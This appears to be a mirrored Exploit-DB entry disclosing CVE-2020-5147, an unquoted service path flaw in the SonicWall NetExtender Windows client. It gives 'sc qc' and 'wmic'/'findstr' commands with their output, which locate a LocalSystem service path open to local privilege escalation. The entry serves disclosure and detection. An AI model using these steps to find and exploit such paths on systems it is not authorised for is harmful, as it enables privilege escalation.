SonicWall NetExtender 10.2.0.300 – Unquoted Service Path

• Exploit Database
• 46 阅读

• 作者： shinnai
  日期： 2021-08-17
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50212/

• # Exploit Title: SonicWall NetExtender 10.2.0.300 -Unquoted Service Path
  # Exploit Author: shinnai
  # Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
  # Version: 10.2.0.300
  # Tested On: Windows
  # CVE: CVE-2020-5147
  
  ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  Title: SonicWall NetExtender windows client unquoted service path 
  vulnerability
  Vers.: 10.2.0.300
  Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/
  
  Advisory: 
  https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
  CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)
  
  URLs:
  https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
  https://shinnai.altervista.org/exploits/SH-029-20210109.html
  
  Desc.:
  SonicWall NetExtender Windows client vulnerable to unquoted service path 
  vulnerability, this allows a local attacker to gain elevated privileges 
  in the host operating system.
  This vulnerability impact SonicWall NetExtender Windows client version 
  10.2.300 and earlier.
  
  Poc:
  
  C:\>sc qc sonicwall_client_protection_svc
  [SC] QueryServiceConfig OPERAZIONI RIUSCITE
  NOME_SERVIZIO: sonicwall_client_protection_svc
   TIPO: 10WIN32_OWN_PROCESS
   TIPO_AVVIO: 2 AUTO_START
   CONTROLLO_ERRORE: 1 NORMAL
   NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client 
  Protection Service\SonicWallClientProtectionService.exe <-- Unquoted 
  Service Path Vulnerability
   GRUPPO_ORDINE_CARICAMENTO :
   TAG : 0
   NOME_VISUALIZZATO : SonicWall Client Protection Service
   DIPENDENZE:
   SERVICE_START_NAME : LocalSystem
  C:\>
  
  ----------------------------------------------------------------------------------------------------------------------------------------------------------------------
  
  C:\>wmic service get name,displayname,pathname,startmode |findstr /i 
  "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
  SonicWall Client Protection Service
  sonicwall_client_protection_svcC:\Program Files\SonicWall\Client 
  Protection Service\SonicWallClientProtectionService.exeAuto
  
  C:\>
  ----------------------------------------------------------------------------------------------------------------------------------------------------------------------